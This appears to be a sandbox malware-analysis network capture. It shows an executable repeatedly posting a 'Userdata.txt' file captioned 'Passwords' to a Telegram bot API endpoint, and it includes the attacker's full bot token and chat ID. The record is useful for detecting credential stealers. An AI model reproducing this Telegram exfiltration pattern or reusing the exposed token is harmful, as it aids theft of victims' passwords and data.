                                                                                                            2025-01-10 20:54:17 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 35 64 37 62 35 66 64 31 38 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd335d7b5fd182Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:54:17 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:54:17 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:54:17 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 35 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 35 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44751,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542457,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            28192.168.2.550030149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:54:18 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd3373912f7e9c
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:54:18 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 37 33 39 31 32 66 37 65 39 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd3373912f7e9cContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:54:19 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:54:18 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:54:19 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 35 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 35 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44752,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542458,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            29192.168.2.550032149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:54:20 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd338ae1dad58b
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:54:20 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 38 61 65 31 64 61 64 35 38 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd338ae1dad58bContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:54:20 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:54:20 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 537
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:54:20 UTC537INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 35 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 36 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44753,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542460,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            30192.168.2.550034149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:54:22 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd33a36afe00b8
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:54:22 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 61 33 36 61 66 65 30 30 62 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd33a36afe00b8Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:54:22 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:54:22 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:54:22 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 35 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 36 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44754,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542462,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            31192.168.2.550036149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:54:23 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd33bd2b6aed7d
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:54:23 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 62 64 32 62 36 61 65 64 37 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd33bd2b6aed7dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:54:23 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:54:23 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:54:23 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 35 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 36 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44755,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542463,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            32192.168.2.550038149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:54:25 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd33d58fba2b56
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:54:25 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 64 35 38 66 62 61 32 62 35 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd33d58fba2b56Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:54:25 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:54:25 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:54:25 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 35 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 36 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44756,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542465,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            33192.168.2.550040149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:54:27 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd33f447b5911d
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:54:27 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 66 34 34 37 62 35 39 31 31 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd33f447b5911dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:54:27 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:54:27 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:54:27 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 35 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 36 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44757,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542467,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            34192.168.2.550042149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:54:28 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd34142e1138ab
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
